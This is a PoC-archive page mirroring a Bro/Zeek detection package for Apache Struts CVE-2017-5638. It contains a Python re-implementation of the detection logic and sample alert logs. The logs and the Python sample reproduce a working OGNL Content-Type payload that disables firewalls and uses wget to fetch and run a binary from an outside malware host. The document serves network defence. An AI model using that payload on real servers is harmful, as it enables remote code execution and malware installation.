Related vulnerability
Title:
Apache Struts 2 input validation error vulnerability
(CVE-2017-5638)
Description: Apache Struts is an open-source project of the Apache Software Foundation, an MVC framework for building enterprise Java web applications, shipped as two main product lines, Struts 1 and Struts 2. The Jakarta Multipart parser in Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has a security vulnerability caused by incorrect handling of file uploads. A remote attacker can exploit it to execute arbitrary commands via a specially crafted Content-Type HTTP header carrying a #cmd= string.
Description
detection for Apache Struts recon and compromise
Introduction
I extended Scott Campbell's script further and made it more complicated :)
While "HTTP_StrutsAttack" will stop 100% of the recon, there was still a minuscule chance that if a scanner hit a vulnerable system, even though we'd block the scanner, the vulnerable system might still perform the wget included in the HTTP request and execute the malware, since we aren't blocking the malware download IP in the wget URL, which is almost always a different one than the recon IP.
So the extended script also extracts the malware download IP.
1) Generates the following notices:
redef enum Notice::Type += {
Attempt,
MalwareURL,
HostileDomainLookup,
MalwareURLClick,
FileDownload,
Compromise,
};
- So now this script extracts the "wget" URL from the Attempt and then, if the URL has a domain (or a CNAMEd domain), the script further tracks down the IP addresses of the malware host and watches for activity.
- If the wget URL is seen in HTTP, we generate a MalwareURLClick notice.
- Further notices follow for FileDownload and Compromise.
- This script is also clusterized.
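The correlation chain the list above describes (Attempt, then MalwareURL extracted from the injected command, then MalwareURLClick/Compromise when one of our hosts contacts the malware host, then FileDownload), together with the #cmd= Content-Type header from the vulnerability description, re-implemented in Python as an added example. This is not the Bro package's code: the event feed (on_http_request/on_file), the local-network list, the 192.0.2.0/24 victim address and the shortened header are constructed for the example; the attacker and malware-host addresses are the ones in the notices below. Unlike the MalwareURL notice on this page, which carries the rest of the command line after the URL, the extractor here stops at the next shell separator.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: the Content-Type header from the Struts::Attempt notice
# on this page, with the long OGNL preamble shortened. The parts that matter
# are the leading "%{" and the "#cmd='...'" assignment holding the command.
SAMPLE_CONTENT_TYPE = (
    "%{(#nike='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#cmd='/etc/init.d/iptables stop;service iptables stop;"
    "wget -c http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;')."
    "(#p=new java.lang.ProcessBuilder(#cmds)).(#process=#p.start())}"
)

# OGNL expression in the header: starts with "%{" and carries "#cmd='...'".
OGNL_CMD_RE = re.compile(r"%\{.*?#cmd='(?P<cmd>[^']*)'", re.DOTALL)
# Download URL inside the injected shell command. Stop at the next shell
# separator so "http://.../xhx;chmod 777 xhx;./xhx;" yields only the URL.
DOWNLOAD_URL_RE = re.compile(
    r"\b(?:wget|curl)\b[^;&|]*?(?P<url>https?://[^\s;&|'\"]+)"
)
# MIME types for dropped binaries (the FileDownload notice shows the first).
EXECUTABLE_MIMES = {"application/x-executable", "application/x-dosexec"}


def extract_cmd(content_type):
    """Return the #cmd payload if the Content-Type carries an OGNL injection, else None."""
    m = OGNL_CMD_RE.search(content_type or "")
    return m.group("cmd") if m else None


def extract_download_urls(cmd):
    """All wget/curl URLs in the injected command, in order of appearance."""
    return [m.group("url") for m in DOWNLOAD_URL_RE.finditer(cmd)]


def url_host_port(url):
    """(host, port) the victim will connect to when it runs the wget."""
    parts = urlsplit(url)
    return parts.hostname, parts.port or (443 if parts.scheme == "https" else 80)


class StrutsTracker:
    """Correlates recon attempts with later contact to the malware hosts they name.

    Notice names mirror the enum above; HostileDomainLookup needs DNS events
    and is not modelled here (assumption: URLs carry an IP, as in the notices).
    """

    def __init__(self, local_nets):
        self.local_nets = [ipaddress.ip_network(n) for n in local_nets]
        self.malware_hosts = {}   # (host, port) -> download URL that named it
        self.notices = []         # (notice_type, orig_h, resp_h, detail)

    def _is_local(self, ip):
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.local_nets)

    def on_http_request(self, orig_h, resp_h, resp_p, content_type=None):
        """One HTTP request: client, server, server port, Content-Type (if any)."""
        cmd = extract_cmd(content_type)
        if cmd is not None:
            self.notices.append(("Struts::Attempt", orig_h, resp_h, cmd))
            for url in extract_download_urls(cmd):
                self.notices.append(("Struts::MalwareURL", orig_h, resp_h, url))
                self.malware_hosts[url_host_port(url)] = url
        # The click: one of our hosts connects to a tracked malware host. Match
        # on host:port rather than the exact URL, because the real download
        # path can differ from the recon one (/xhx vs /tcp/xhx in the notices).
        key = (resp_h, resp_p)
        if key in self.malware_hosts and self._is_local(orig_h):
            url = self.malware_hosts[key]
            self.notices.append(("Struts::MalwareURLClick", orig_h, resp_h, url))
            self.notices.append(("Struts::Compromise", orig_h, resp_h, url))

    def on_file(self, orig_h, resp_h, resp_p, mime_type, url):
        """One file seen over HTTP; an executable from a tracked host is the dropper."""
        if (resp_h, resp_p) in self.malware_hosts and mime_type in EXECUTABLE_MIMES:
            self.notices.append(("Struts::FileDownload", orig_h, resp_h, url))

    def notice_types(self):
        return [n[0] for n in self.notices]


def demo():
    """Replays the event chain behind the example notices (victim address constructed)."""
    t = StrutsTracker(local_nets=["192.0.2.0/24"])
    # 1) scanner hits our web server with the OGNL payload in Content-Type
    t.on_http_request("1.24.191.108", "192.0.2.10", 80, SAMPLE_CONTENT_TYPE)
    # 2) our server runs the wget and connects to the malware host
    t.on_http_request("192.0.2.10", "121.42.249.245", 1996)
    # 3) file analysis reports the fetched binary
    t.on_file("192.0.2.10", "121.42.249.245", 1996,
              "application/x-executable", "http://121.42.249.245:1996/tcp/xhx")
    return t


if __name__ == "__main__":
    for n in demo().notices:
        print(*n)
```

The local-network check is what keeps this from firing on the scanner itself: only a connection from one of our hosts to a tracked malware host counts as a click, which is exactly the case the paragraph above worries about (the scanner is blocked, the victim's outbound wget is not).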
I ran it over 24 hours and things look stable with respect to the script. I am still sure there might be some lame detection holes, so feel free to modify and let me know too.
Surprisingly, unlike previous times, I don't see a huge volume of Struts scanners. I am seeing in the range of ~20s a day instead of ~1000s a day.
Here are example notices:
1489228734.171565 CbVq832QovIwAQddf2 1.24.191.108 65000 131.243.X.Y 80 - - - tcp Struts::Attempt CVE-2017-5638/Struts attack from 1.24.191.108 seen: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} - 1.24.191.108 131.243.X.Y 80 - worker-5 Notice::ACTION_LOG 3600.000000 F - -- - -
1489237401.399275 C90k4o1Zrn8D7vaXoe 124.117.244.34 49728 128.3.Y.Z 80 - - - tcp Struts::MalwareURL Struts Hostile URLs seen in recon attempt 124.117.244.34 to 128.3.Y.Z with URL [http://121.42.249.245:1996/xhx;chmod 777 xhx;./xhx;] - 124.117.244.34 128.3.Y.Z 80 - worker-13 Notice::ACTION_LOG 3600.000000 F - - - - -
1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::MalwareURLClick Struts Hostile URL seen 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 60.000000 F - - - - -
1489240937.969456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 - - - tcp Struts::Compromise Struts compromise: 128.3.X.Y=121.42.249.245 [http://121.42.249.245:1996/tcp/xhx] - 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F - - - - -
1489240940.206456 CpUhgp1VJnPuOLY8h 128.3.X.Y 33755 121.42.249.245 1996 Frx9jZ1JkcrsVtgOkg application/x-executable http://121.42.249.245:1996/tcp/xhx tcp Struts::FileDownload http://121.42.249.245:1996/tcp/xhx http://121.42.249.245:1996/tcp/xhx 128.3.X.Y 121.42.249.245 1996 - worker-15 Notice::ACTION_LOG 3600.000000 F
File snapshot
[4.0K] /data/pocs/af6182ec020ddf612c8cf200f6716b9d078eba4a
├── [ 136] bro-pkg.meta
├── [1.5K] COPYING
├── [4.3K] README.md
├── [4.0K] scripts
│ ├── [ 10K] CVE-2017-5638_struts-cluster.bro
│ └── [ 41] __load__.bro
└── [4.0K] tests
├── [4.0K] Baseline
│ └── [4.0K] CVE-2017-5638_struts.CVE-2017-5638_struts
│ └── [5.0K] notice.log
├── [ 535] btest.cfg
├── [4.0K] CVE-2017-5638_struts
│ └── [ 121] CVE-2017-5638_struts.bro
├── [ 15] Makefile
└── [4.0K] Traces
└── [5.4M] HTTP-CVE-2017-5638_struts.pcap
6 directories, 10 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is no longer available or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to keep it maintained long term, please consider paying for the local POC. Thank you for your support.